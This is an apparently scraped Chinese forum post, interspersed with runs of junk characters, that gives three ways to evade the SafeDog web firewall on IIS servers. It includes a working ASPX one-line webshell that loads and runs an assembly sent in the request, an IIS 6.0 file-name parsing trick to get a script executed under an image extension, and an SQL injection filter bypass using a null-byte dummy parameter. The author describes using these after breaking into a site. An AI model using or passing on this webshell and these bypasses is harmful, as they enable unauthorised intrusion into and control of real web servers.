1、绕过IIS安全狗的一句话。
: v u6 Y, T, y H( I% h1 `; N前几天测试一个网站。找到突破口之后,写入webshell,但服务器上装有IIS安全狗,平时常用的一句话或者shell都用不了。下面这段.net一句话可以突破。
4 i$ n/ W [; y. j% u# Z0 f4 s# p0 j<%@ Page Language="C#" ValidateRequest="false" %> <%try{System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["admin163.net"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null,null); } catch { }%>连接端用cncert的aspx一句话客户端。
+ \8 u& s b5 n9 I( Y6 t
/ M0 i! x K8 Q& P" O& f+ u2、IIS6.0解析漏洞遇到安全狗。
e$ h1 q& F$ M! W0 o9 g文件名为
) a) ?* f# J, m6 \! M7 C$ _3 N1 L. rhttp://www.xxxxx.com/sh3llc0de.asp;1.jpg% a# `3 j: z: W" r6 c
5 E7 Z. \7 H# m6 X0 @2 S# O G这样的会被IIS安全狗果断屏蔽。
) T5 P+ v$ D. ~) D改成如下名称,IIS6一样会解析:
% ]: [' x* ~& iwww.xxxxx.com/;1.asp;1.jpg
& i. l; r5 \9 Q' l5 I1 _2 O. S! @. l0 A; U+ K. m S
3、安全狗的注入绕过。
& ~2 s! V+ c8 U8 {常用的如r00ts.asp?id=1 and 1=1 是会被安全狗屏蔽的。
- e4 u& O) k; Q1 _ _但如果:$ s- i3 M/ j: d
r00ts.asp?r00ts.com=%00.&id=69%20 and 1=1
! M" w0 q1 {6 X/ r* N7 [4 z就可以成功绕过了。
. Z, y! {7 Y* W- M; e# o- j
0 x n) B* N. Y8 S
# ^ f# d' E' M$ n: M; c# a |